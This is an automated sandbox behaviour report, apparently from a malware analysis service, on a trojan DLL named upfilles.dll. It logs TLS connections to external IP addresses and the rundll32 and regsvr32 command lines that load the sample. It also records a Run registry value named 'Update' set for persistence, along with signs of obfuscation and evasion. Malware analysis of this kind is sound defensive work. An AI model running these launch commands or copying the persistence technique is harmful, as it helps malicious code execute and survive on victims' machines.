Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800012B0 NtConnectPort,NtRequestWaitReplyPort,NtRequestPort,	6_2_00000001800012B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180001490 NtCreateSection,LocalAlloc,LocalAlloc,NtConnectPort,NtRequestWaitReplyPort,	6_2_0000000180001490
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180001650 RtlInitUnicodeString,NtClose,NtClose,RtlNtStatusToDosError,SetLastError,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_0000000180001650
Source: C:\Windows\System32\rundll32.exe	Code function: 18_3_000002921300D31C NtProtectVirtualMemory,	18_3_000002921300D31C
Source: C:\Windows\System32\rundll32.exe	Code function: 18_3_000002921300D2AC NtAllocateVirtualMemory,	18_3_000002921300D2AC
Source: C:\Windows\explorer.exe	Code function: 22_2_013A6814 NtFreeVirtualMemory,	22_2_013A6814
Source: C:\Windows\explorer.exe	Code function: 22_2_013A958C NtAllocateVirtualMemory,	22_2_013A958C
Source: C:\Windows\explorer.exe	Code function: 22_2_013AA5CC NtDelayExecution,	22_2_013AA5CC
Source: C:\Windows\explorer.exe	Code function: 22_2_013A6728 NtWriteFile,	22_2_013A6728
Source: C:\Windows\explorer.exe	Code function: 22_2_013A6618 RtlInitUnicodeString,NtCreateFile,	22_2_013A6618
Source: C:\Windows\explorer.exe	Code function: 22_2_013A650C RtlInitUnicodeString,NtCreateFile,NtClose,	22_2_013A650C
Source: C:\Windows\explorer.exe	Code function: 22_2_013A6464 RtlInitUnicodeString,NtOpenFile,NtClose,	22_2_013A6464
Source: C:\Windows\explorer.exe	Code function: 22_2_013A67A0 NtClose,	22_2_013A67A0

Detected potential crypto function

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001C030	6_2_000000018001C030
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000A040	6_2_000000018000A040
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800190AC	6_2_00000001800190AC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180001950	6_2_0000000180001950
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000B992	6_2_000000018000B992
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800131E0	6_2_00000001800131E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000E200	6_2_000000018000E200
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000B210	6_2_000000018000B210
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800192B8	6_2_00000001800192B8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180020B88	6_2_0000000180020B88
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180004C00	6_2_0000000180004C00
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180013448	6_2_0000000180013448
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001C45C	6_2_000000018001C45C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000C480	6_2_000000018000C480
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001EC90	6_2_000000018001EC90
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800154A0	6_2_00000001800154A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180023584	6_2_0000000180023584
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800176FC	6_2_00000001800176FC
Source: C:\Windows\System32\rundll32.exe	Code function: 18_2_00000292116E254C	18_2_00000292116E254C
Source: C:\Windows\System32\rundll32.exe	Code function: 18_2_000000026E7DFB4C	18_2_000000026E7DFB4C
Source: C:\Windows\explorer.exe	Code function: 22_2_013A1030	22_2_013A1030

One or more processes crash

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344

Sample file is different than original file name gathered from version info

Source: upfilles.dll.dll

Binary or memory string: OriginalFilenameeppcom64.dllZ vs upfilles.dll.dll

Source: classification engine

Classification label: mal100.troj.evad.winDLL@32/17@8/6

Source: C:\Windows\System32\rundll32.exe

Code function: 18_3_00007DF4F0240000 CreateToolhelp32Snapshot,Process32First,Process32Next,

18_3_00007DF4F0240000

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018000AEB0 CoCreateInstance,

6_2_000000018000AEB0

Source: C:\Windows\System32\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7272
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7288
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6324
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6516

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\ba1d38a4-2e70-4cdd-8ce4-6f972928d4e8

Jump to behavior

Source: upfilles.dll.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1

Source: upfilles.dll.dll

ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6516 -s 344
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7272 -s 344
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7288 -s 344
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: upfilles.dll.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: upfilles.dll.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: upfilles.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: upfilles.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: upfilles.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: upfilles.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: upfilles.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

PE file contains an invalid checksum

Source: upfilles.dll.dll

Static PE information: real checksum: 0x491bb should be: 0x85fc5

PE file contains sections with non-standard names

Source: upfilles.dll.dll

Static PE information: section name: hVr

Registers a DLL

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180006138 push E8000020h; iretd	6_2_000000018000613D
Source: C:\Windows\System32\rundll32.exe	Code function: 18_2_00000292116A5BB0 push r15; ret	18_2_00000292116A5BB5
Source: C:\Windows\System32\rundll32.exe	Code function: 18_2_000000026E7A31B0 push r15; ret	18_2_000000026E7A31B5

Source: C:\Windows\System32\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180023584 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_0000000180023584

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
